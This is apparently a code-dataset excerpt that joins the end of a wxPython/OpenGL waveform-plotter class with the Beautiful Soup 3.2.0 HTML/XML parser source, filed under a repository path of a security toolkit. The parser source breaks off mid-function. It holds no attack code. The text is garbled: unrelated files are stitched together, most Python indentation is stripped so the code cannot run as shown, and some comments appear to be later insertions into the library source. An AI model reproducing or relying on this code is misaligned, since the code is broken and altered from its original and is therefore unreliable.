samples = self._channels[channel][SAMPLES_KEY]
num_samps = len(samples)
if not num_samps: continue
#use opengl to scale the waveform
GL.glPushMatrix()
GL.glTranslatef(self.padding_left, self.padding_top, 0)
GL.glScalef(
(self.width-self.padding_left-self.padding_right),
(self.height-self.padding_top-self.padding_bottom),
1,
)
GL.glTranslatef(0, 1, 0)
if isinstance(samples, tuple):
x_scale, x_trans = 1.0/(self.x_max-self.x_min), -self.x_min
points = zip(*samples)
else:
x_scale, x_trans = 1.0/(num_samps-1), -self._channels[channel][TRIG_OFF_KEY]
points = zip(numpy.arange(0, num_samps), samples)
GL.glScalef(x_scale, -1.0/(self.y_max-self.y_min), 1)
GL.glTranslatef(x_trans, -self.y_min, 0)
#draw the points/lines
GL.glColor3f(*self._channels[channel][COLOR_SPEC_KEY])
marker = self._channels[channel][MARKERY_KEY]
if marker is None:
GL.glVertexPointerf(points)
GL.glDrawArrays(GL.GL_LINE_STRIP, 0, len(points))
elif isinstance(marker, (int, float)) and marker > 0:
GL.glPointSize(marker)
GL.glVertexPointerf(points)
GL.glDrawArrays(GL.GL_POINTS, 0, len(points))
GL.glPopMatrix()
GL.glDisable(GL.GL_SCISSOR_TEST)
def _populate_point_label(self, x_val, y_val):
"""
Get the text the will populate the point label.
Give X and Y values for the current point.
Give values for the channel at the X coordinate.
@param x_val the current x value
@param y_val the current y value
@return a string with newlines
"""
#create text
label_str = '%s: %s\n%s: %s'%(
self.x_label, common.eng_format(x_val, self.x_units),
self.y_label, common.eng_format(y_val, self.y_units),
)
for channel in sorted(self._channels.keys()):
samples = self._channels[channel][SAMPLES_KEY]
num_samps = len(samples)
if not num_samps: continue
if isinstance(samples, tuple): continue
#linear interpolation
x_index = (num_samps-1)*(x_val-self.x_min)/(self.x_max-self.x_min)
x_index_low = int(math.floor(x_index))
x_index_high = int(math.ceil(x_index))
scale = x_index - x_index_low + self._channels[channel][TRIG_OFF_KEY]
y_value = (samples[x_index_high] - samples[x_index_low])*scale + samples[x_index_low]
label_str += '\n%s: %s'%(channel, common.eng_format(y_value, self.y_units))
return label_str
	def _call_callback(self, x_val, y_val):
		if self.callback is not None:
			self.callback(x_val, y_val)
	def set_callback(self, callback):
		self.callback = callback
def _draw_legend(self):
"""
Draw the legend in the upper right corner.
For each channel, draw a rectangle out of the channel color,
and overlay the channel text on top of the rectangle.
"""
if not self.enable_legend(): return
x_off = self.width - self.padding_right - LEGEND_BOX_PADDING
for i, channel in enumerate(reversed(sorted(self._channels.keys()))):
samples = self._channels[channel][SAMPLES_KEY]
if not len(samples): continue
color_spec = self._channels[channel][COLOR_SPEC_KEY]
txt = gltext.Text(channel, font_size=LEGEND_TEXT_FONT_SIZE)
w, h = txt.get_size()
#draw rect + text
GL.glColor3f(*color_spec)
self._draw_rect(
x_off - w - LEGEND_BOX_PADDING,
self.padding_top/2 - h/2 - LEGEND_BOX_PADDING,
w+2*LEGEND_BOX_PADDING,
h+2*LEGEND_BOX_PADDING,
)
txt.draw_text(wx.Point(x_off - w, self.padding_top/2 - h/2))
x_off -= w + 4*LEGEND_BOX_PADDING
def clear_waveform(self, channel):
"""
Remove a waveform from the list of waveforms.
@param channel the channel key
"""
self.lock()
if channel in self._channels.keys():
self._channels.pop(channel)
self._legend_cache.changed(True)
self._waveform_cache.changed(True)
self.unlock()
def set_waveform(self, channel, samples=[], color_spec=(0, 0, 0), marker=None, trig_off=0):
"""
Set the waveform for a given channel.
@param channel the channel key
@param samples the waveform samples
@param color_spec the 3-tuple for line color
@param marker None for line
@param trig_off fraction of sample for trigger offset
"""
self.lock()
if channel not in self._channels.keys(): self._legend_cache.changed(True)
self._channels[channel] = {
SAMPLES_KEY: samples,
COLOR_SPEC_KEY: color_spec,
MARKERY_KEY: marker,
TRIG_OFF_KEY: trig_off,
}
self._waveform_cache.changed(True)
self.unlock()
if __name__ == '__main__':
app = wx.PySimpleApp()
frame = wx.Frame(None, -1, 'Demo', wx.DefaultPosition)
vbox = wx.BoxSizer(wx.VERTICAL)
plotter = channel_plotter(frame)
plotter.set_x_grid(-1, 1, .2)
plotter.set_y_grid(-1, 1, .4)
vbox.Add(plotter, 1, wx.EXPAND)
plotter = channel_plotter(frame)
plotter.set_x_grid(-1, 1, .2)
plotter.set_y_grid(-1, 1, .4)
vbox.Add(plotter, 1, wx.EXPAND)
frame.SetSizerAndFit(vbox)
frame.SetSize(wx.Size(800, 600))
frame.Show()
app.MainLoop()
|
krintoxi/NoobSec-Toolkit
|
refs/heads/master
|
NoobSecToolkit /tools/inject/thirdparty/beautifulsoup/beautifulsoup.py
|
25
|
"""Beautiful Soup
Elixir and Tonic
"The Screen-Scraper's Friend"
http://www.crummy.com/software/BeautifulSoup/
Beautiful Soup parses a (possibly invalid) XML or HTML document into a
tree representation. It provides methods and Pythonic idioms that make
it easy to navigate, search, and modify the tree.
A well-formed XML/HTML document yields a well-formed data
structure. An ill-formed XML/HTML document yields a correspondingly
ill-formed data structure. If your document is only locally
well-formed, you can use this library to find and process the
well-formed part of it.
Beautiful Soup works with Python 2.2 and up. It has no external
dependencies, but you'll have more success at converting data to UTF-8
if you also install these three packages:
* chardet, for auto-detecting character encodings
http://chardet.feedparser.org/
* cjkcodecs and iconv_codec, which add more encodings to the ones supported
by stock Python.
http://cjkpython.i18n.org/
Beautiful Soup defines classes for two main parsing strategies:
* BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific
language that kind of looks like XML.
* BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid
or invalid. This class has web browser-like heuristics for
obtaining a sensible parse tree in the face of common HTML errors.
Beautiful Soup also defines a class (UnicodeDammit) for autodetecting
the encoding of an HTML or XML document, and converting it to
Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser.
For more than you ever wanted to know about Beautiful Soup, see the
documentation:
http://www.crummy.com/software/BeautifulSoup/documentation.html
Here, have some legalese:
Copyright (c) 2004-2010, Leonard Richardson
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* Neither the name of the the Beautiful Soup Consortium and All
Night Kosher Bakery nor the names of its contributors may be
used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT.
"""
from __future__ import generators
__author__ = "Leonard Richardson (leonardr@segfault.org)"
__version__ = "3.2.0"
__copyright__ = "Copyright (c) 2004-2010 Leonard Richardson"
__license__ = "New-style BSD"
from sgmllib import SGMLParser, SGMLParseError
import codecs
import markupbase
import types
import re
import sgmllib
try:
from htmlentitydefs import name2codepoint
except ImportError:
name2codepoint = {}
try:
set
except NameError:
from sets import Set as set
#These hacks make Beautiful Soup able to parse XML with namespaces
sgmllib.tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*')
markupbase._declname_match = re.compile(r'[a-zA-Z][-_.:a-zA-Z0-9]*\s*').match
DEFAULT_OUTPUT_ENCODING = "utf-8"
def _match_css_class(str):
"""Build a RE to match the given CSS class."""
return re.compile(r"(^|.*\s)%s($|\s)" % str)
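# Illustrative only (my addition): _match_css_class builds a regex that
# matches a class attribute containing the given class as a whitespace-
# separated word, e.g.
#   _match_css_class('foo').match('bar foo baz')  # -> match object
#   _match_css_class('foo').match('foobar')       # -> None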
# First, the classes that represent markup elements.
class PageElement(object):
"""Contains the navigational information for some part of the page
(either a tag or a piece of text)"""
def setup(self, parent=None, previous=None):
"""Sets up the initial relations between this element and
other elements."""
self.parent = parent
self.previous = previous
self.next = None
self.previousSibling = None
self.nextSibling = None
if self.parent and self.parent.contents:
self.previousSibling = self.parent.contents[-1]
self.previousSibling.nextSibling = self
def replaceWith(self, replaceWith):
oldParent = self.parent
myIndex = self.parent.index(self)
if hasattr(replaceWith, "parent")\
and replaceWith.parent is self.parent:
# We're replacing this element with one of its siblings.
index = replaceWith.parent.index(replaceWith)
if index and index < myIndex:
# Furthermore, it comes before this element. That
# means that when we extract it, the index of this
# element will change.
myIndex = myIndex - 1
self.extract()
oldParent.insert(myIndex, replaceWith)
def replaceWithChildren(self):
myParent = self.parent
myIndex = self.parent.index(self)
self.extract()
reversedChildren = list(self.contents)
reversedChildren.reverse()
for child in reversedChildren:
myParent.insert(myIndex, child)
def extract(self):
"""Destructively rips this element out of the tree."""
if self.parent:
try:
del self.parent.contents[self.parent.index(self)]
except ValueError:
pass
#Find the two elements that would be next to each other if
#this element (and any children) hadn't been parsed. Connect
#the two.
lastChild = self._lastRecursiveChild()
nextElement = lastChild.next
if self.previous:
self.previous.next = nextElement
if nextElement:
nextElement.previous = self.previous
self.previous = None
lastChild.next = None
self.parent = None
if self.previousSibling:
self.previousSibling.nextSibling = self.nextSibling
if self.nextSibling:
self.nextSibling.previousSibling = self.previousSibling
self.previousSibling = self.nextSibling = None
return self
def _lastRecursiveChild(self):
"Finds the last element beneath this object to be parsed."
lastChild = self
while hasattr(lastChild, 'contents') and lastChild.contents:
lastChild = lastChild.contents[-1]
return lastChild
def insert(self, position, newChild):
if isinstance(newChild, basestring) \
and not isinstance(newChild, NavigableString):
newChild = NavigableString(newChild)
position = min(position, len(self.contents))
if hasattr(newChild, 'parent') and newChild.parent is not None:
# We're 'inserting' an element that's already one
# of this object's children.
if newChild.parent is self:
index = self.index(newChild)
if index > position:
# Furthermore we're moving it further down the
# list of this object's children. That means that
# when we extract this element, our target index
# will jump down one.
position = position - 1
newChild.extract()
newChild.parent = self
previousChild = None
if position == 0:
newChild.previousSibling = None
newChild.previous = self
else:
previousChild = self.contents[position-1]
newChild.previousSibling = previousChild
newChild.previousSibling.nextSibling = newChild
newChild.previous = previousChild._lastRecursiveChild()
if newChild.previous:
newChild.previous.next = newChild
newChildsLastElement = newChild._lastRecursiveChild()
if position >= len(self.contents):
newChild.nextSibling = None
parent = self
parentsNextSibling = None
while not parentsNextSibling:
parentsNextSibling = parent.nextSibling
parent = parent.parent
if not parent: # This is the last element in the document.
break
if parentsNextSibling:
newChildsLastElement.next = parentsNextSibling
else:
newChildsLastElement.next = None
else:
nextChild = self.contents[position]
newChild.nextSibling = nextChild
if newChild.nextSibling:
newChild.nextSibling.previousSibling = newChild
newChildsLastElement.next = nextChild
if newChildsLastElement.next:
newChildsLastElement.next.previous = newChildsLastElement
self.contents.insert(position, newChild)
def append(self, tag):
"""Appends the given tag to the contents of this tag."""
self.insert(len(self.contents), tag)
def findNext(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the first item that matches the given criteria and
appears after this Tag in the document."""
return self._findOne(self.findAllNext, name, attrs, text, **kwargs)
def findAllNext(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns all items that match the given criteria and appear
after this Tag in the document."""
return self._findAll(name, attrs, text, limit, self.nextGenerator,
**kwargs)
def findNextSibling(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the closest sibling to this Tag that matches the
given criteria and appears after this Tag in the document."""
return self._findOne(self.findNextSiblings, name, attrs, text,
**kwargs)
def findNextSiblings(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns the siblings of this Tag that match the given
criteria and appear after this Tag in the document."""
return self._findAll(name, attrs, text, limit,
self.nextSiblingGenerator, **kwargs)
fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x
def findPrevious(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the first item that matches the given criteria and
appears before this Tag in the document."""
return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs)
def findAllPrevious(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns all items that match the given criteria and appear
before this Tag in the document."""
return self._findAll(name, attrs, text, limit, self.previousGenerator,
**kwargs)
fetchPrevious = findAllPrevious # Compatibility with pre-3.x
def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the closest sibling to this Tag that matches the
given criteria and appears before this Tag in the document."""
return self._findOne(self.findPreviousSiblings, name, attrs, text,
**kwargs)
def findPreviousSiblings(self, name=None, attrs={}, text=None,
limit=None, **kwargs):
"""Returns the siblings of this Tag that match the given
criteria and appear before this Tag in the document."""
return self._findAll(name, attrs, text, limit,
self.previousSiblingGenerator, **kwargs)
fetchPreviousSiblings = findPreviousSiblings # Compatibility with pre-3.x
def findParent(self, name=None, attrs={}, **kwargs):
"""Returns the closest parent of this Tag that matches the given
criteria."""
# NOTE: We can't use _findOne because findParents takes a different
# set of arguments.
r = None
l = self.findParents(name, attrs, 1)
if l:
r = l[0]
return r
def findParents(self, name=None, attrs={}, limit=None, **kwargs):
"""Returns the parents of this Tag that match the given
criteria."""
return self._findAll(name, attrs, None, limit, self.parentGenerator,
**kwargs)
fetchParents = findParents # Compatibility with pre-3.x
#These methods do the real heavy lifting.
def _findOne(self, method, name, attrs, text, **kwargs):
r = None
l = method(name, attrs, text, 1, **kwargs)
if l:
r = l[0]
return r
def _findAll(self, name, attrs, text, limit, generator, **kwargs):
"Iterates over a generator looking for things that match."
if isinstance(name, SoupStrainer):
strainer = name
# (Possibly) special case some findAll*(...) searches
elif text is None and not limit and not attrs and not kwargs:
# findAll*(True)
if name is True:
return [element for element in generator()
if isinstance(element, Tag)]
# findAll*('tag-name')
elif isinstance(name, basestring):
return [element for element in generator()
if isinstance(element, Tag) and
element.name == name]
else:
strainer = SoupStrainer(name, attrs, text, **kwargs)
# Build a SoupStrainer
else:
strainer = SoupStrainer(name, attrs, text, **kwargs)
results = ResultSet(strainer)
g = generator()
while True:
try:
i = g.next()
except StopIteration:
break
if i:
found = strainer.search(i)
if found:
results.append(found)
if limit and len(results) >= limit:
break
return results
#These Generators can be used to navigate starting from both
#NavigableStrings and Tags.
def nextGenerator(self):
i = self
while i is not None:
i = i.next
yield i
def nextSiblingGenerator(self):
i = self
while i is not None:
i = i.nextSibling
yield i
def previousGenerator(self):
i = self
while i is not None:
i = i.previous
yield i
def previousSiblingGenerator(self):
i = self
while i is not None:
i = i.previousSibling
yield i
def parentGenerator(self):
i = self
while i is not None:
i = i.parent
yield i
# Utility methods
def substituteEncoding(self, str, encoding=None):
encoding = encoding or "utf-8"
return str.replace("%SOUP-ENCODING%", encoding)
def toEncoding(self, s, encoding=None):
"""Encodes an object to a string in some encoding, or to Unicode.
."""
if isinstance(s, unicode):
if encoding:
s = s.encode(encoding)
elif isinstance(s, str):
if encoding:
s = s.encode(encoding)
else:
s = unicode(s)
else:
if encoding:
s = self.toEncoding(str(s), encoding)
else:
s = unicode(s)
return s
class NavigableString(unicode, PageElement):
def __new__(cls, value):
"""Create a new NavigableString.
When unpickling a NavigableString, this method is called with
the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be
passed in to the superclass's __new__ or the superclass won't know
how to handle non-ASCII characters.
"""
if isinstance(value, unicode):
return unicode.__new__(cls, value)
return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING)
def __getnewargs__(self):
return (NavigableString.__str__(self),)
def __getattr__(self, attr):
"""text.string gives you text. This is for backwards
compatibility for Navigable*String, but for CData* it lets you
get the string without the CData wrapper."""
if attr == 'string':
return self
else:
raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr)
def __unicode__(self):
return str(self).decode(DEFAULT_OUTPUT_ENCODING)
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
if encoding:
return self.encode(encoding)
else:
return self
class CData(NavigableString):
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
return "<![CDATA[%s]]>" % NavigableString.__str__(self, encoding)
class ProcessingInstruction(NavigableString):
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
output = self
if "%SOUP-ENCODING%" in output:
output = self.substituteEncoding(output, encoding)
return "<?%s?>" % self.toEncoding(output, encoding)
class Comment(NavigableString):
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
return "<!--%s-->" % NavigableString.__str__(self, encoding)
class Declaration(NavigableString):
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
return "<!%s>" % NavigableString.__str__(self, encoding)
class Tag(PageElement):
"""Represents a found HTML tag with its attributes and contents."""
def _invert(h):
"Cheap function to invert a hash."
i = {}
for k,v in h.items():
i[v] = k
return i
XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'",
"quot" : '"',
"amp" : "&",
"lt" : "<",
"gt" : ">" }
XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS)
def _convertEntities(self, match):
"""Used in a call to re.sub to replace HTML, XML, and numeric
entities with the appropriate Unicode characters. If HTML
entities are being converted, any unrecognized entities are
escaped."""
x = match.group(1)
if self.convertHTMLEntities and x in name2codepoint:
return unichr(name2codepoint[x])
elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS:
if self.convertXMLEntities:
return self.XML_ENTITIES_TO_SPECIAL_CHARS[x]
else:
return u'&%s;' % x
elif len(x) > 0 and x[0] == '#':
# Handle numeric entities
if len(x) > 1 and x[1] == 'x':
return unichr(int(x[2:], 16))
else:
return unichr(int(x[1:]))
        elif self.escapeUnrecognizedEntities:
            return u'&amp;%s;' % x
else:
return u'&%s;' % x
def __init__(self, parser, name, attrs=None, parent=None,
previous=None):
"Basic constructor."
# We don't actually store the parser object: that lets extracted
# chunks be garbage-collected
self.parserClass = parser.__class__
self.isSelfClosing = parser.isSelfClosingTag(name)
self.name = name
if attrs is None:
attrs = []
elif isinstance(attrs, dict):
attrs = attrs.items()
self.attrs = attrs
self.contents = []
self.setup(parent, previous)
self.hidden = False
self.containsSubstitutions = False
self.convertHTMLEntities = parser.convertHTMLEntities
self.convertXMLEntities = parser.convertXMLEntities
self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities
# Convert any HTML, XML, or numeric entities in the attribute values.
convert = lambda(k, val): (k,
re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);",
self._convertEntities,
val))
self.attrs = map(convert, self.attrs)
def getString(self):
if (len(self.contents) == 1
and isinstance(self.contents[0], NavigableString)):
return self.contents[0]
def setString(self, string):
"""Replace the contents of the tag with a string"""
self.clear()
self.append(string)
string = property(getString, setString)
def getText(self, separator=u""):
if not len(self.contents):
return u""
stopNode = self._lastRecursiveChild().next
strings = []
current = self.contents[0]
while current is not stopNode:
if isinstance(current, NavigableString):
strings.append(current.strip())
current = current.next
return separator.join(strings)
text = property(getText)
def get(self, key, default=None):
"""Returns the value of the 'key' attribute for the tag, or
the value given for 'default' if it doesn't have that
attribute."""
return self._getAttrMap().get(key, default)
def clear(self):
"""Extract all children."""
for child in self.contents[:]:
child.extract()
def index(self, element):
for i, child in enumerate(self.contents):
if child is element:
return i
raise ValueError("Tag.index: element not in tag")
def has_key(self, key):
return self._getAttrMap().has_key(key)
def __getitem__(self, key):
"""tag[key] returns the value of the 'key' attribute for the tag,
and throws an exception if it's not there."""
return self._getAttrMap()[key]
def __iter__(self):
"Iterating over a tag iterates over its contents."
return iter(self.contents)
def __len__(self):
"The length of a tag is the length of its list of contents."
return len(self.contents)
def __contains__(self, x):
return x in self.contents
def __nonzero__(self):
"A tag is non-None even if it has no contents."
return True
def __setitem__(self, key, value):
"""Setting tag[key] sets the value of the 'key' attribute for the
tag."""
self._getAttrMap()
self.attrMap[key] = value
found = False
for i in xrange(0, len(self.attrs)):
if self.attrs[i][0] == key:
self.attrs[i] = (key, value)
found = True
if not found:
self.attrs.append((key, value))
self._getAttrMap()[key] = value
def __delitem__(self, key):
"Deleting tag[key] deletes all 'key' attributes for the tag."
for item in self.attrs:
if item[0] == key:
self.attrs.remove(item)
#We don't break because bad HTML can define the same
#attribute multiple times.
self._getAttrMap()
if self.attrMap.has_key(key):
del self.attrMap[key]
def __call__(self, *args, **kwargs):
"""Calling a tag like a function is the same as calling its
findAll() method. Eg. tag('a') returns a list of all the A tags
found within this tag."""
        return self.findAll(*args, **kwargs)
def __getattr__(self, tag):
#print "Getattr %s.%s" % (self.__class__, tag)
if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3:
return self.find(tag[:-3])
elif tag.find('__') != 0:
return self.find(tag)
raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__, tag)
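    # Illustrative note (not in the original source): because of __getattr__
    # above, soup.bTag and soup.b are both shorthand for soup.find('b').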
def __eq__(self, other):
"""Returns true iff this tag has the same name, the same attributes,
and the same contents (recursively) as the given tag.
NOTE: right now this will return false if two tags have the
same attributes in a different order. Should this be fixed?"""
if other is self:
return True
if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other):
return False
for i in xrange(0, len(self.contents)):
if self.contents[i] != other.contents[i]:
return False
return True
def __ne__(self, other):
"""Returns true iff this tag is not identical to the other tag,
as defined in __eq__."""
return not self == other
def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING):
"""Renders this tag as a string."""
return self.__str__(encoding)
def __unicode__(self):
return self.__str__(None)
BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|"
+ "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)"
+ ")")
def _sub_entity(self, x):
"""Used with a regular expression to substitute the
appropriate XML entity for an XML special character."""
return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";"
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING,
prettyPrint=False, indentLevel=0):
"""Returns a string or Unicode representation of this tag and
its contents. To get Unicode, pass None for encoding.
NOTE: since Python's HTML parser consumes whitespace, this
method is not certain to reproduce the whitespace present in
the original string."""
encodedName = self.toEncoding(self.name, encoding)
attrs = []
if self.attrs:
for key, val in self.attrs:
fmt = '%s="%s"'
if isinstance(val, basestring):
if self.containsSubstitutions and '%SOUP-ENCODING%' in val:
val = self.substituteEncoding(val, encoding)
# The attribute value either:
#
# * Contains no embedded double quotes or single quotes.
# No problem: we enclose it in double quotes.
# * Contains embedded single quotes. No problem:
# double quotes work here too.
# * Contains embedded double quotes. No problem:
# we enclose it in single quotes.
# * Embeds both single _and_ double quotes. This
# can't happen naturally, but it can happen if
# you modify an attribute value after parsing
# the document. Now we have a bit of a
# problem. We solve it by enclosing the
# attribute in single quotes, and escaping any
# embedded single quotes to XML entities.
if '"' in val:
fmt = "%s='%s'"
if "'" in val:
# TODO: replace with apos when
# appropriate.
val = val.replace("'", "&squot;")
# Now we're okay w/r/t quotes. But the attribute
# value might also contain angle brackets, or
# ampersands that aren't part of entities. We need
# to escape those to XML entities too.
val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val)
attrs.append(fmt % (self.toEncoding(key, encoding),
self.toEncoding(val, encoding)))
close = ''
closeTag = ''
if self.isSelfClosing:
close = ' /'
else:
closeTag = '</%s>' % encodedName
indentTag, indentContents = 0, 0
if prettyPrint:
indentTag = indentLevel
space = (' ' * (indentTag-1))
indentContents = indentTag + 1
contents = self.renderContents(encoding, prettyPrint, indentContents)
if self.hidden:
s = contents
else:
s = []
attributeString = ''
if attrs:
attributeString = ' ' + ' '.join(attrs)
if prettyPrint:
s.append(space)
s.append('<%s%s%s>' % (encodedName, attributeString, close))
if prettyPrint:
s.append("\n")
s.append(contents)
if prettyPrint and contents and contents[-1] != "\n":
s.append("\n")
if prettyPrint and closeTag:
s.append(space)
s.append(closeTag)
if prettyPrint and closeTag and self.nextSibling:
s.append("\n")
s = ''.join(s)
return s
def decompose(self):
"""Recursively destroys the contents of this tree."""
self.extract()
if len(self.contents) == 0:
return
current = self.contents[0]
while current is not None:
next = current.next
if isinstance(current, Tag):
del current.contents[:]
current.parent = None
current.previous = None
current.previousSibling = None
current.next = None
current.nextSibling = None
current = next
def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING):
return self.__str__(encoding, True)
def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING,
prettyPrint=False, indentLevel=0):
"""Renders the contents of this tag as a string in the given
        encoding. If encoding is None, returns a Unicode string."""
        s = []
for c in self:
text = None
if isinstance(c, NavigableString):
text = c.__str__(encoding)
elif isinstance(c, Tag):
s.append(c.__str__(encoding, prettyPrint, indentLevel))
if text and prettyPrint:
text = text.strip()
if text:
if prettyPrint:
s.append(" " * (indentLevel-1))
s.append(text)
if prettyPrint:
s.append("\n")
return ''.join(s)
#Soup methods
def find(self, name=None, attrs={}, recursive=True, text=None,
**kwargs):
"""Return only the first child of this Tag matching the given
criteria."""
r = None
l = self.findAll(name, attrs, recursive, text, 1, **kwargs)
if l:
r = l[0]
return r
findChild = find
def findAll(self, name=None, attrs={}, recursive=True, text=None,
limit=None, **kwargs):
"""Extracts a list of Tag objects that match the given
criteria. You can specify the name of the Tag and any
attributes you want the Tag to have.
The value of a key-value pair in the 'attrs' map can be a
string, a list of strings, a regular expression object, or a
callable that takes a string and returns whether or not the
string matches for some custom definition of 'matches'. The
same is true of the tag name."""
generator = self.recursiveChildGenerator
if not recursive:
generator = self.childGenerator
return self._findAll(name, attrs, text, limit, generator, **kwargs)
findChildren = findAll
# Pre-3.x compatibility methods
first = find
fetch = findAll
def fetchText(self, text=None, recursive=True, limit=None):
return self.findAll(text=text, recursive=recursive, limit=limit)
def firstText(self, text=None, recursive=True):
return self.find(text=text, recursive=recursive)
#Private methods
def _getAttrMap(self):
"""Initializes a map representation of this tag's attributes,
if not already initialized."""
        if not getattr(self, 'attrMap', None):
self.attrMap = {}
for (key, value) in self.attrs:
self.attrMap[key] = value
return self.attrMap
#Generator methods
def childGenerator(self):
# Just use the iterator from the contents
return iter(self.contents)
def recursiveChildGenerator(self):
if not len(self.contents):
raise StopIteration
stopNode = self._lastRecursiveChild().next
current = self.contents[0]
while current is not stopNode:
yield current
current = current.next
# Next, a couple classes to represent queries and their results.
class SoupStrainer:
"""Encapsulates a number of ways of matching a markup element (tag or
text)."""
def __init__(self, name=None, attrs={}, text=None, **kwargs):
self.name = name
if isinstance(attrs, basestring):
kwargs['class'] = _match_css_class(attrs)
attrs = None
if kwargs:
if attrs:
attrs = attrs.copy()
attrs.update(kwargs)
else:
attrs = kwargs
self.attrs = attrs
self.text = text
def __str__(self):
if self.text:
return self.text
else:
return "%s|%s" % (self.name, self.attrs)
def searchTag(self, markupName=None, markupAttrs={}):
found = None
markup = None
if isinstance(markupName, Tag):
markup = markupName
markupAttrs = markup
callFunctionWithTagData = callable(self.name) \
and not isinstance(markupName, Tag)
if (not self.name) \
or callFunctionWithTagData \
or (markup and self._matches(markup, self.name)) \
or (not markup and self._matches(markupName, self.name)):
if callFunctionWithTagData:
match = self.name(markupName, markupAttrs)
else:
match = True
markupAttrMap = None
for attr, matchAgainst in self.attrs.items():
if not markupAttrMap:
if hasattr(markupAttrs, 'get'):
markupAttrMap = markupAttrs
else:
markupAttrMap = {}
for k,v in markupAttrs:
markupAttrMap[k] = v
attrValue = markupAttrMap.get(attr)
if not self._matches(attrValue, matchAgainst):
match = False
break
if match:
if markup:
found = markup
else:
found = markupName
return found
def search(self, markup):
#print 'looking for %s in %s' % (self, markup)
found = None
# If given a list of items, scan it for a text element that
# matches.
if hasattr(markup, "__iter__") \
and not isinstance(markup, Tag):
for element in markup:
if isinstance(element, NavigableString) \
and self.search(element):
found = element
break
# If it's a Tag, make sure its name or attributes match.
# Don't bother with Tags if we're searching for text.
elif isinstance(markup, Tag):
if not self.text:
found = self.searchTag(markup)
# If it's text, make sure the text matches.
elif isinstance(markup, NavigableString) or \
isinstance(markup, basestring):
if self._matches(markup, self.text):
found = markup
else:
raise Exception, "I don't know how to match against a %s" \
% markup.__class__
return found
def _matches(self, markup, matchAgainst):
#print "Matching %s against %s" % (markup, matchAgainst)
result = False
if matchAgainst is True:
result = markup is not None
elif callable(matchAgainst):
result = matchAgainst(markup)
else:
#Custom match methods take the tag as an argument, but all
#other ways of matching match the tag name as a string.
if isinstance(markup, Tag):
markup = markup.name
if markup and not isinstance(markup, basestring):
markup = unicode(markup)
#Now we know that chunk is either a string, or None.
if hasattr(matchAgainst, 'match'):
# It's a regexp object.
result = markup and matchAgainst.search(markup)
elif hasattr(matchAgainst, '__iter__'): # list-like
result = markup in matchAgainst
elif hasattr(matchAgainst, 'items'):
result = markup.has_key(matchAgainst)
elif matchAgainst and isinstance(markup, basestring):
if isinstance(markup, unicode):
matchAgainst = unicode(matchAgainst)
else:
matchAgainst = str(matchAgainst)
if not result:
result = matchAgainst == markup
return result
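# Illustrative summary of SoupStrainer._matches (not part of the original
# source): matchAgainst may be True (any non-None markup), a callable, a
# compiled regex (tested with .search), a list of acceptable names, or a
# plain string compared for equality.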
class ResultSet(list):
"""A ResultSet is just a list that keeps track of the SoupStrainer
that created it."""
def __init__(self, source):
list.__init__([])
self.source = source
# Now, some helper functions.
def buildTagMap(default, *args):
